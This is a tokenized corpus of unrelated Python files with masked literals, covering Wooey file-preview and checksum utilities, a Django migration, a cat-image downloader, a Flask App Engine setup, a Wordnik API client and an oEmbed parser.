is_active : <EOL> ret [ '<STR_LIT>' ] = True <EOL> if obj . is_active is True : <EOL> if set ( list ( user . groups . all ( ) ) ) & set ( list ( groups ) ) : <EOL> ret [ '<STR_LIT>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' if wooey_settings . WOOEY_SHOW_LOCKED_SCRIPTS else '<STR_LIT>' <EOL> return ret <EOL> def mkdirs ( path ) : <EOL> try : <EOL> os . makedirs ( path ) <EOL> except OSError as exc : <EOL> if exc . errno == errno . EEXIST and os . path . isdir ( path ) : <EOL> pass <EOL> else : <EOL> raise <EOL> def get_upload_path ( filepath , checksum = None ) : <EOL> filename = os . path . split ( filepath ) [ <NUM_LIT:1> ] <EOL> if checksum is None : <EOL> checksum = get_checksum ( filepath ) <EOL> return os . path . join ( wooey_settings . WOOEY_FILE_DIR , checksum [ : <NUM_LIT:2> ] , checksum [ - <NUM_LIT:2> : ] , checksum , filename ) <EOL> def get_file_info ( filepath ) : <EOL> filetype , preview = False , None <EOL> tests = [ ( '<STR_LIT>' , test_delimited ) , ( '<STR_LIT>' , test_fastx ) , ( '<STR_LIT:image>' , test_image ) ] <EOL> while filetype is False and tests : <EOL> ptype , pmethod = tests . pop ( ) <EOL> filetype , preview = pmethod ( filepath ) <EOL> filetype = ptype if filetype else filetype <EOL> preview = None if filetype is False else preview <EOL> filetype = None if filetype is False else filetype <EOL> try : <EOL> json_preview = json . dumps ( preview ) <EOL> except : <EOL> sys . stderr . write ( '<STR_LIT>' . format ( traceback . format_exc ( ) ) ) <EOL> json_preview = json . dumps ( None ) <EOL> return { '<STR_LIT:type>' : filetype , '<STR_LIT>' : json_preview } <EOL> def test_image ( filepath ) : <EOL> import imghdr <EOL> return imghdr . what ( filepath ) != None , None <EOL> def test_delimited ( filepath ) : <EOL> import csv <EOL> if six . 
PY3 : <EOL> handle = open ( filepath , '<STR_LIT:r>' , newline = '<STR_LIT>' ) <EOL> else : <EOL> handle = open ( filepath , '<STR_LIT:rb>' ) <EOL> with handle as csv_file : <EOL> try : <EOL> dialect = csv . Sniffer ( ) . sniff ( csv_file . read ( <NUM_LIT> * <NUM_LIT:16> ) , delimiters = '<STR_LIT>' ) <EOL> except Exception as e : <EOL> return False , None <EOL> csv_file . seek ( <NUM_LIT:0> ) <EOL> reader = csv . reader ( csv_file , dialect ) <EOL> rows = [ ] <EOL> try : <EOL> for index , entry in enumerate ( reader ) : <EOL> rows . append ( entry ) <EOL> except Exception as e : <EOL> return False , None <EOL> if len ( rows ) > <NUM_LIT:10> : <EOL> rows = rows [ : <NUM_LIT:5> ] + [ None ] + rows [ - <NUM_LIT:5> : ] <EOL> return True , rows <EOL> def test_fastx ( filepath ) : <EOL> with open ( filepath , encoding = '<STR_LIT>' ) as fastx_file : <EOL> sequences = OrderedDict ( ) <EOL> seq = [ ] <EOL> header = '<STR_LIT>' <EOL> found_caret = False <EOL> for row_index , row in enumerate ( fastx_file , <NUM_LIT:1> ) : <EOL> if row_index > <NUM_LIT:30> : <EOL> break <EOL> if not row . strip ( ) : <EOL> continue <EOL> if found_caret is False and row [ <NUM_LIT:0> ] != '<STR_LIT:>>' : <EOL> if row [ <NUM_LIT:0> ] == '<STR_LIT:;>' : <EOL> continue <EOL> break <EOL> elif found_caret is False and row [ <NUM_LIT:0> ] == '<STR_LIT:>>' : <EOL> found_caret = True <EOL> if row and row [ <NUM_LIT:0> ] == '<STR_LIT:>>' : <EOL> if seq : <EOL> sequences [ header ] = '<STR_LIT>' . join ( seq ) <EOL> seq = [ ] <EOL> header = row <EOL> elif row : <EOL> seq . append ( row ) <EOL> if seq and header : <EOL> sequences [ header ] = '<STR_LIT>' . join ( seq ) <EOL> if sequences : <EOL> rows = [ ] <EOL> [ rows . extend ( [ i , v ] ) for i , v in six . iteritems ( sequences ) ] <EOL> return True , rows <EOL> return False , None <EOL> def create_job_fileinfo ( job ) : <EOL> parameters = job . get_parameters ( ) <EOL> from . . 
models import WooeyFile , UserFile <EOL> files = [ ] <EOL> local_storage = get_storage ( local = True ) <EOL> for field in parameters : <EOL> try : <EOL> if field . parameter . form_field == '<STR_LIT>' : <EOL> value = field . value <EOL> if value is None : <EOL> continue <EOL> if isinstance ( value , six . string_types ) : <EOL> if local_storage . exists ( value ) : <EOL> if not get_storage ( local = False ) . exists ( value ) : <EOL> get_storage ( local = False ) . save ( value , File ( local_storage . open ( value ) ) ) <EOL> value = field . value <EOL> else : <EOL> field . force_value ( None ) <EOL> try : <EOL> with transaction . atomic ( ) : <EOL> field . save ( ) <EOL> except : <EOL> sys . stderr . write ( '<STR_LIT>' . format ( traceback . format_exc ( ) ) ) <EOL> continue <EOL> d = { '<STR_LIT>' : field , '<STR_LIT:file>' : value } <EOL> if field . parameter . is_output : <EOL> full_path = os . path . join ( job . save_path , os . path . split ( local_storage . path ( value ) ) [ <NUM_LIT:1> ] ) <EOL> checksum = get_checksum ( value , extra = [ job . pk , full_path , '<STR_LIT>' ] ) <EOL> d [ '<STR_LIT>' ] = checksum <EOL> files . append ( d ) <EOL> except ValueError : <EOL> continue <EOL> known_files = { i [ '<STR_LIT:file>' ] . name for i in files } <EOL> file_groups = { '<STR_LIT>' : [ ] } <EOL> absbase = os . path . join ( settings . MEDIA_ROOT , job . save_path ) <EOL> for root , dirs , dir_files in os . walk ( absbase ) : <EOL> for filename in dir_files : <EOL> new_name = os . path . join ( job . save_path , filename ) <EOL> if any ( [ i . endswith ( new_name ) for i in known_files ] ) : <EOL> continue <EOL> try : <EOL> filepath = os . path . join ( root , filename ) <EOL> if os . path . isdir ( filepath ) : <EOL> continue <EOL> full_path = os . path . join ( job . save_path , filename ) <EOL> checksum = get_checksum ( filepath , extra = [ job . 
pk , full_path , '<STR_LIT>' ] ) <EOL> try : <EOL> storage_file = get_storage_object ( full_path ) <EOL> except : <EOL> sys . stderr . write ( '<STR_LIT>' . format ( full_path , traceback . format_exc ( ) ) ) <EOL> continue <EOL> d = { '<STR_LIT:name>' : filename , '<STR_LIT:file>' : storage_file , '<STR_LIT>' : storage_file . size , '<STR_LIT>' : checksum } <EOL> if filename . endswith ( '<STR_LIT>' ) or filename . endswith ( '<STR_LIT>' ) : <EOL> file_groups [ '<STR_LIT>' ] . append ( d ) <EOL> else : <EOL> files . append ( d ) <EOL> except IOError : <EOL> sys . stderr . write ( '<STR_LIT:{}>' . format ( traceback . format_exc ( ) ) ) <EOL> continue <EOL> file_groups [ '<STR_LIT:all>' ] = files <EOL> file_groups [ '<STR_LIT:image>' ] = [ ] <EOL> file_groups [ '<STR_LIT>' ] = [ ] <EOL> file_groups [ '<STR_LIT>' ] = [ ] <EOL> for filemodel in files : <EOL> fileinfo = get_file_info ( filemodel [ '<STR_LIT:file>' ] . path ) <EOL> filetype = fileinfo . get ( '<STR_LIT:type>' ) <EOL> if filetype is not None : <EOL> file_groups [ filetype ] . append ( dict ( filemodel , ** { '<STR_LIT>' : fileinfo . get ( '<STR_LIT>' ) } ) ) <EOL> else : <EOL> filemodel [ '<STR_LIT>' ] = json . dumps ( None ) <EOL> grouped = set ( [ i [ '<STR_LIT:file>' ] . path for file_type , groups in six . iteritems ( file_groups ) for i in groups if file_type != '<STR_LIT:all>' ] ) <EOL> for file_type , group_files in six . iteritems ( file_groups ) : <EOL> for group_file in group_files : <EOL> if file_type == '<STR_LIT:all>' and group_file [ '<STR_LIT:file>' ] . path in grouped : <EOL> continue <EOL> try : <EOL> preview = group_file . get ( '<STR_LIT>' ) <EOL> size_bytes = group_file . get ( '<STR_LIT>' ) <EOL> filepath = group_file [ '<STR_LIT:file>' ] . path <EOL> save_path = job . get_relative_path ( filepath ) <EOL> parameter = group_file . get ( '<STR_LIT>' ) <EOL> checksum = group_file . get ( '<STR_LIT>' , get_checksum ( filepath ) ) <EOL> try : <EOL> wooey_file = WooeyFile . objects . 
get ( checksum = checksum ) <EOL> file_created = False <EOL> except ObjectDoesNotExist : <EOL> wooey_file = WooeyFile ( <EOL> checksum = checksum , <EOL> filetype = file_type , <EOL> filepreview = preview , <EOL> size_bytes = size_bytes , <EOL> filepath = save_path <EOL> ) <EOL> file_created = True <EOL> userfile_kwargs = { <EOL> '<STR_LIT>' : job , <EOL> '<STR_LIT>' : parameter , <EOL> '<STR_LIT>' : wooey_file , <EOL> '<STR_LIT:filename>' : os . path . split ( filepath ) [ <NUM_LIT:1> ] <EOL> } <EOL> try : <EOL> with transaction . atomic ( ) : <EOL> if file_created : <EOL> wooey_file . save ( ) <EOL> job . save ( ) <EOL> UserFile . objects . get_or_create ( ** userfile_kwargs ) <EOL> except : <EOL> sys . stderr . write ( '<STR_LIT>' . format ( traceback . format_exc ( ) ) ) <EOL> except : <EOL> sys . stderr . write ( '<STR_LIT>' . format ( traceback . format_exc ( ) ) ) <EOL> continue <EOL> def get_checksum ( path , extra = None ) : <EOL> import hashlib <EOL> BLOCKSIZE = <NUM_LIT> <EOL> hasher = hashlib . sha1 ( ) <EOL> if extra : <EOL> if isinstance ( extra , ( list , tuple ) ) : <EOL> for i in extra : <EOL> hasher . update ( six . u ( str ( i ) ) . encode ( '<STR_LIT:utf-8>' ) ) <EOL> elif isinstance ( extra , six . string_types ) : <EOL> hasher . update ( extra ) <EOL> if isinstance ( path , six . string_types ) : <EOL> with open ( path , '<STR_LIT:rb>' ) as afile : <EOL> buf = afile . read ( BLOCKSIZE ) <EOL> while len ( buf ) > <NUM_LIT:0> : <EOL> hasher . update ( buf ) <EOL> buf = afile . read ( BLOCKSIZE ) <EOL> else : <EOL> start = path . tell ( ) <EOL> path . seek ( <NUM_LIT:0> ) <EOL> buf = path . read ( BLOCKSIZE ) <EOL> while len ( buf ) > <NUM_LIT:0> : <EOL> hasher . update ( buf ) <EOL> buf = path . read ( BLOCKSIZE ) <EOL> path . seek ( start ) <EOL> return hasher . hexdigest ( ) <EOL> def get_grouped_file_previews ( files ) : <EOL> groups = { '<STR_LIT:all>' : [ ] } <EOL> for file_info in files : <EOL> system_file = file_info . 
system_file <EOL> filedict = { '<STR_LIT:id>' : system_file . id , <EOL> '<STR_LIT:object>' : system_file , <EOL> '<STR_LIT:name>' : file_info . filename , <EOL> '<STR_LIT>' : json . loads ( system_file . filepreview ) if system_file . filepreview else None , <EOL> '<STR_LIT:url>' : get_storage ( local = False ) . url ( system_file . filepath . name ) , <EOL> '<STR_LIT>' : file_info . parameter . parameter . script_param if file_info . parameter else None , <EOL> '<STR_LIT>' : os . path . basename ( system_file . filepath . name ) , <EOL> '<STR_LIT>' : system_file . filetype , <EOL> '<STR_LIT>' : system_file . size_bytes , <EOL> } <EOL> try : <EOL> groups [ system_file . filetype ] . append ( filedict ) <EOL> except KeyError : <EOL> groups [ system_file . filetype ] = [ filedict ] <EOL> if system_file . filetype != '<STR_LIT:all>' : <EOL> groups [ '<STR_LIT:all>' ] . append ( filedict ) <EOL> return groups <EOL> def get_file_previews ( job ) : <EOL> from . . models import UserFile <EOL> files = UserFile . objects . filter ( job = job ) <EOL> return get_grouped_file_previews ( files ) <EOL> def get_file_previews_by_ids ( ids ) : <EOL> from . . models import UserFile <EOL> files = UserFile . objects . filter ( pk__in = ids ) <EOL> return get_grouped_file_previews ( files ) <EOL> def normalize_query ( query_string , <EOL> findterms = re . compile ( r'<STR_LIT>' ) . findall , <EOL> normspace = re . compile ( r'<STR_LIT>' ) . sub ) : <EOL> """<STR_LIT>""" <EOL> return [ normspace ( '<STR_LIT:U+0020>' , ( t [ <NUM_LIT:0> ] or t [ <NUM_LIT:1> ] ) . 
strip ( ) ) for t in findterms ( query_string ) ] <EOL> def get_query ( query_string , search_fields ) : <EOL> """<STR_LIT>""" <EOL> query = None <EOL> terms = normalize_query ( query_string ) <EOL> for term in terms : <EOL> or_query = None <EOL> for field_name in search_fields : <EOL> q = Q ( ** { "<STR_LIT>" % field_name : term } ) <EOL> if or_query is None : <EOL> or_query = q <EOL> else : <EOL> or_query = or_query | q <EOL> if query is None : <EOL> query = or_query <EOL> else : <EOL> query = query & or_query <EOL> if query is None : <EOL> query = Q ( ) <EOL> return query </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( related_name = '<STR_LIT>' , to = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( to = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( to = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( to = '<STR_LIT>' ) , <EOL> ) , <EOL> ] </s>
<s> __author__ = '<STR_LIT>' <EOL> import argparse <EOL> import sys <EOL> import os <EOL> from urllib import FancyURLopener <EOL> from apiclient import discovery <EOL> description = """<STR_LIT>""" <EOL> parser = argparse . ArgumentParser ( description = description ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , type = int , default = <NUM_LIT:1> ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , type = str , choices = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> class MyOpener ( FancyURLopener ) : <EOL> version = '<STR_LIT>' <EOL> myopener = MyOpener ( ) <EOL> def main ( ) : <EOL> args = parser . parse_args ( ) <EOL> searchTerm = '<STR_LIT>' if args . kittens else '<STR_LIT>' <EOL> cat_count = args . count if args . count < <NUM_LIT:10> else <NUM_LIT:10> <EOL> if args . breed : <EOL> searchTerm += '<STR_LIT>' . format ( args . breed ) <EOL> service = discovery . build ( '<STR_LIT>' , '<STR_LIT>' , developerKey = os . environ . get ( '<STR_LIT>' ) ) <EOL> cse = service . cse ( ) <EOL> search_kwrds = { <EOL> '<STR_LIT:q>' : searchTerm , <EOL> '<STR_LIT>' : os . environ . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cat_count , <EOL> '<STR_LIT>' : '<STR_LIT:image>' <EOL> } <EOL> request = cse . list ( ** search_kwrds ) <EOL> response = request . execute ( ) <EOL> for item in response [ '<STR_LIT>' ] : <EOL> url = item . get ( '<STR_LIT>' ) <EOL> filename = url . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:1> ] <EOL> myopener . retrieve ( url , filename ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( ) ) </s>
<s> import logging <EOL> import os <EOL> import sys <EOL> logging . basicConfig ( format = '<STR_LIT>' ) <EOL> logging . getLogger ( ) . setLevel ( logging . DEBUG ) <EOL> logging . disable ( logging . NOTSET ) <EOL> logging . info ( '<STR_LIT>' , __name__ , os . getenv ( '<STR_LIT>' ) ) <EOL> PRODUCTION = not os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) <EOL> DEBUG = not PRODUCTION <EOL> if not PRODUCTION : <EOL> import website . logcfg <EOL> website . logcfg . setup_logging ( ) <EOL> SRC_DIR = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> LIB_DIR = os . path . join ( SRC_DIR , '<STR_LIT>' ) <EOL> if os . path . exists ( LIB_DIR ) : <EOL> for path in os . listdir ( LIB_DIR ) : <EOL> path = os . path . join ( LIB_DIR , path ) <EOL> if path . endswith ( "<STR_LIT>" ) and path not in sys . path : <EOL> logging . debug ( "<STR_LIT>" % path ) <EOL> sys . path . append ( path ) <EOL> if LIB_DIR not in sys . path : <EOL> logging . debug ( "<STR_LIT>" , LIB_DIR ) <EOL> sys . path . append ( LIB_DIR ) <EOL> TEMPLATE_FOLDER = os . path . join ( SRC_DIR , "<STR_LIT>" ) <EOL> STATIC_FOLDER = os . path . join ( SRC_DIR , "<STR_LIT>" ) <EOL> STATIC_URL = '<STR_LIT>' <EOL> try : <EOL> import flask_social_blueprint <EOL> except ImportError : <EOL> import sys <EOL> sys . path . append ( os . path . join ( os . path . dirname ( os . path . dirname ( SRC_DIR ) ) , "<STR_LIT:src>" ) ) <EOL> from flask import Flask <EOL> app = Flask ( __name__ , template_folder = TEMPLATE_FOLDER , static_folder = STATIC_FOLDER , static_url_path = STATIC_URL ) <EOL> app . debug = DEBUG <EOL> app . testing = DEBUG <EOL> if not PRODUCTION : <EOL> from google . appengine . tools . devappserver2 . python import sandbox <EOL> sandbox . _WHITE_LIST_C_MODULES += [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> import website . settings <EOL> app . config . from_object ( website . 
settings ) <EOL> config = "<STR_LIT>" if PRODUCTION else "<STR_LIT>" <EOL> import importlib <EOL> try : <EOL> cfg = importlib . import_module ( config ) <EOL> logging . debug ( "<STR_LIT>" % config ) <EOL> app . config . from_object ( cfg ) <EOL> except ImportError : <EOL> logging . warning ( "<STR_LIT>" , config ) <EOL> from flask_babel import Babel <EOL> babel = Babel ( app ) <EOL> import auth . models <EOL> auth . models . init_app ( app ) <EOL> import auth . views <EOL> app . register_blueprint ( auth . views . app ) <EOL> if app . debug : <EOL> from werkzeug . debug import DebuggedApplication <EOL> app . wsgi_app = DebuggedApplication ( app . wsgi_app , True ) <EOL> if not PRODUCTION : <EOL> @ app . before_request <EOL> def setup_wsgi_errors ( ) : <EOL> from flask import request <EOL> request . environ [ '<STR_LIT>' ] = sys . stderr </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> from models import * <EOL> class WordListApi ( object ) : <EOL> def __init__ ( self , apiClient ) : <EOL> self . apiClient = apiClient <EOL> def updateWordList ( self , permalink , auth_token , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> allParams = [ '<STR_LIT>' , '<STR_LIT:body>' , '<STR_LIT>' ] <EOL> params = locals ( ) <EOL> for ( key , val ) in params [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if key not in allParams : <EOL> raise TypeError ( "<STR_LIT>" % key ) <EOL> params [ key ] = val <EOL> del params [ '<STR_LIT>' ] <EOL> resourcePath = '<STR_LIT>' <EOL> resourcePath = resourcePath . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> method = '<STR_LIT>' <EOL> queryParams = { } <EOL> headerParams = { } <EOL> if ( '<STR_LIT>' in params ) : <EOL> headerParams [ '<STR_LIT>' ] = params [ '<STR_LIT>' ] <EOL> if ( '<STR_LIT>' in params ) : <EOL> replacement = str ( self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) ) <EOL> resourcePath = resourcePath . replace ( '<STR_LIT:{>' + '<STR_LIT>' + '<STR_LIT:}>' , <EOL> replacement ) <EOL> postData = ( params [ '<STR_LIT:body>' ] if '<STR_LIT:body>' in params else None ) <EOL> response = self . apiClient . callAPI ( resourcePath , method , queryParams , <EOL> postData , headerParams ) <EOL> def deleteWordList ( self , permalink , auth_token , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> allParams = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> params = locals ( ) <EOL> for ( key , val ) in params [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if key not in allParams : <EOL> raise TypeError ( "<STR_LIT>" % key ) <EOL> params [ key ] = val <EOL> del params [ '<STR_LIT>' ] <EOL> resourcePath = '<STR_LIT>' <EOL> resourcePath = resourcePath . 
replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> method = '<STR_LIT>' <EOL> queryParams = { } <EOL> headerParams = { } <EOL> if ( '<STR_LIT>' in params ) : <EOL> headerParams [ '<STR_LIT>' ] = params [ '<STR_LIT>' ] <EOL> if ( '<STR_LIT>' in params ) : <EOL> replacement = str ( self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) ) <EOL> resourcePath = resourcePath . replace ( '<STR_LIT:{>' + '<STR_LIT>' + '<STR_LIT:}>' , <EOL> replacement ) <EOL> postData = ( params [ '<STR_LIT:body>' ] if '<STR_LIT:body>' in params else None ) <EOL> response = self . apiClient . callAPI ( resourcePath , method , queryParams , <EOL> postData , headerParams ) <EOL> def getWordListByPermalink ( self , permalink , auth_token , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> allParams = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> params = locals ( ) <EOL> for ( key , val ) in params [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if key not in allParams : <EOL> raise TypeError ( "<STR_LIT>" % key ) <EOL> params [ key ] = val <EOL> del params [ '<STR_LIT>' ] <EOL> resourcePath = '<STR_LIT>' <EOL> resourcePath = resourcePath . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> method = '<STR_LIT:GET>' <EOL> queryParams = { } <EOL> headerParams = { } <EOL> if ( '<STR_LIT>' in params ) : <EOL> headerParams [ '<STR_LIT>' ] = params [ '<STR_LIT>' ] <EOL> if ( '<STR_LIT>' in params ) : <EOL> replacement = str ( self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) ) <EOL> resourcePath = resourcePath . replace ( '<STR_LIT:{>' + '<STR_LIT>' + '<STR_LIT:}>' , <EOL> replacement ) <EOL> postData = ( params [ '<STR_LIT:body>' ] if '<STR_LIT:body>' in params else None ) <EOL> response = self . apiClient . callAPI ( resourcePath , method , queryParams , <EOL> postData , headerParams ) <EOL> if not response : <EOL> return None <EOL> responseObject = self . apiClient . 
deserialize ( response , '<STR_LIT>' ) <EOL> return responseObject <EOL> def addWordsToWordList ( self , permalink , auth_token , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> allParams = [ '<STR_LIT>' , '<STR_LIT:body>' , '<STR_LIT>' ] <EOL> params = locals ( ) <EOL> for ( key , val ) in params [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if key not in allParams : <EOL> raise TypeError ( "<STR_LIT>" % key ) <EOL> params [ key ] = val <EOL> del params [ '<STR_LIT>' ] <EOL> resourcePath = '<STR_LIT>' <EOL> resourcePath = resourcePath . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> method = '<STR_LIT:POST>' <EOL> queryParams = { } <EOL> headerParams = { } <EOL> if ( '<STR_LIT>' in params ) : <EOL> headerParams [ '<STR_LIT>' ] = params [ '<STR_LIT>' ] <EOL> if ( '<STR_LIT>' in params ) : <EOL> replacement = str ( self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) ) <EOL> resourcePath = resourcePath . replace ( '<STR_LIT:{>' + '<STR_LIT>' + '<STR_LIT:}>' , <EOL> replacement ) <EOL> postData = ( params [ '<STR_LIT:body>' ] if '<STR_LIT:body>' in params else None ) <EOL> response = self . apiClient . callAPI ( resourcePath , method , queryParams , <EOL> postData , headerParams ) <EOL> def getWordListWords ( self , permalink , auth_token , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> allParams = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> params = locals ( ) <EOL> for ( key , val ) in params [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if key not in allParams : <EOL> raise TypeError ( "<STR_LIT>" % key ) <EOL> params [ key ] = val <EOL> del params [ '<STR_LIT>' ] <EOL> resourcePath = '<STR_LIT>' <EOL> resourcePath = resourcePath . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> method = '<STR_LIT:GET>' <EOL> queryParams = { } <EOL> headerParams = { } <EOL> if ( '<STR_LIT>' in params ) : <EOL> queryParams [ '<STR_LIT>' ] = self . apiClient . 
toPathValue ( params [ '<STR_LIT>' ] ) <EOL> if ( '<STR_LIT>' in params ) : <EOL> queryParams [ '<STR_LIT>' ] = self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) <EOL> if ( '<STR_LIT>' in params ) : <EOL> queryParams [ '<STR_LIT>' ] = self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) <EOL> if ( '<STR_LIT>' in params ) : <EOL> queryParams [ '<STR_LIT>' ] = self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) <EOL> if ( '<STR_LIT>' in params ) : <EOL> headerParams [ '<STR_LIT>' ] = params [ '<STR_LIT>' ] <EOL> if ( '<STR_LIT>' in params ) : <EOL> replacement = str ( self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) ) <EOL> resourcePath = resourcePath . replace ( '<STR_LIT:{>' + '<STR_LIT>' + '<STR_LIT:}>' , <EOL> replacement ) <EOL> postData = ( params [ '<STR_LIT:body>' ] if '<STR_LIT:body>' in params else None ) <EOL> response = self . apiClient . callAPI ( resourcePath , method , queryParams , <EOL> postData , headerParams ) <EOL> if not response : <EOL> return None <EOL> responseObject = self . apiClient . deserialize ( response , '<STR_LIT>' ) <EOL> return responseObject <EOL> def deleteWordsFromWordList ( self , permalink , auth_token , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> allParams = [ '<STR_LIT>' , '<STR_LIT:body>' , '<STR_LIT>' ] <EOL> params = locals ( ) <EOL> for ( key , val ) in params [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if key not in allParams : <EOL> raise TypeError ( "<STR_LIT>" % key ) <EOL> params [ key ] = val <EOL> del params [ '<STR_LIT>' ] <EOL> resourcePath = '<STR_LIT>' <EOL> resourcePath = resourcePath . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> method = '<STR_LIT:POST>' <EOL> queryParams = { } <EOL> headerParams = { } <EOL> if ( '<STR_LIT>' in params ) : <EOL> headerParams [ '<STR_LIT>' ] = params [ '<STR_LIT>' ] <EOL> if ( '<STR_LIT>' in params ) : <EOL> replacement = str ( self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) ) <EOL> resourcePath = resourcePath . 
replace ( '<STR_LIT:{>' + '<STR_LIT>' + '<STR_LIT:}>' , <EOL> replacement ) <EOL> postData = ( params [ '<STR_LIT:body>' ] if '<STR_LIT:body>' in params else None ) <EOL> response = self . apiClient . callAPI ( resourcePath , method , queryParams , <EOL> postData , headerParams ) </s>
<s> """<STR_LIT>""" <EOL> class Syllable : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . swaggerTypes = { <EOL> '<STR_LIT:text>' : '<STR_LIT:str>' , <EOL> '<STR_LIT>' : '<STR_LIT:int>' , <EOL> '<STR_LIT:type>' : '<STR_LIT:str>' <EOL> } <EOL> self . text = None <EOL> self . seq = None <EOL> self . type = None </s>
<s> import os <EOL> from django . template import RequestContext , Context <EOL> from django . template . loader import render_to_string , select_template <EOL> from oembed . constants import CONSUMER_URLIZE_ALL <EOL> from oembed . utils import mock_request <EOL> class BaseParser ( object ) : <EOL> def render_oembed ( self , oembed_resource , original_url , template_dir = None , <EOL> context = None ) : <EOL> """<STR_LIT>""" <EOL> provided_context = context or Context ( ) <EOL> context = RequestContext ( context . get ( "<STR_LIT>" ) or mock_request ( ) ) <EOL> context . update ( provided_context ) <EOL> template_name = '<STR_LIT>' % oembed_resource . type <EOL> templates = [ os . path . join ( '<STR_LIT>' , template_name ) , '<STR_LIT>' ] <EOL> if template_dir : <EOL> templates . insert ( <NUM_LIT:0> , os . path . join ( '<STR_LIT>' , template_dir , template_name ) ) <EOL> template = select_template ( templates ) <EOL> context . push ( ) <EOL> context [ '<STR_LIT>' ] = oembed_resource <EOL> context [ '<STR_LIT>' ] = original_url <EOL> rendered = template . render ( context ) <EOL> context . pop ( ) <EOL> return rendered . strip ( ) <EOL> def parse ( self , text , maxwidth = None , maxheight = None , template_dir = None , <EOL> context = None , urlize_all_links = CONSUMER_URLIZE_ALL ) : <EOL> """<STR_LIT>""" <EOL> context = context or Context ( ) <EOL> context [ '<STR_LIT>' ] = maxwidth <EOL> context [ '<STR_LIT>' ] = maxheight <EOL> try : <EOL> text = unicode ( text ) <EOL> except UnicodeDecodeError : <EOL> text = unicode ( text . decode ( '<STR_LIT:utf-8>' ) ) <EOL> return self . parse_data ( text , maxwidth , maxheight , template_dir , <EOL> context , urlize_all_links ) <EOL> def parse_data ( self , text , maxwidth , maxheight , template_dir , context , <EOL> urlize_all_links ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def extract_urls ( self , text ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) </s>
